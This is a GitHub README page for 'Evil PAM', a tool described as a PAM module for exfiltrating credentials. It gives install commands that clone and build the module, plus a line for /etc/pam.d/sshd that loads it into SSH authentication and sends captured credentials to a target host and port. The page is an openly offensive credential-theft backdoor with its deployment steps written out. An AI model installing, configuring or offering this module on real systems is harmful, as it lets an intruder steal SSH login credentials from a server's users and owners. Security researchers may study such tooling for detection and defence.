Skip to content

Latest commit

 

History

History
24 lines (19 loc) · 710 Bytes

README.md

File metadata and controls

24 lines (19 loc) · 710 Bytes

Evil PAM

PAM module to exfiltrate credentials

Usage

Install the module:

apt install libpam0g-dev
git clone https://github.com/itasahobby/pam_evil.git
make install

Configure SSH to use the PAM module adding the following to /etc/pam.d/sshd:

auth       optional     pam_evil.so target=127.0.0.1 port=8888

Mentions

In colaboration with Dreg

References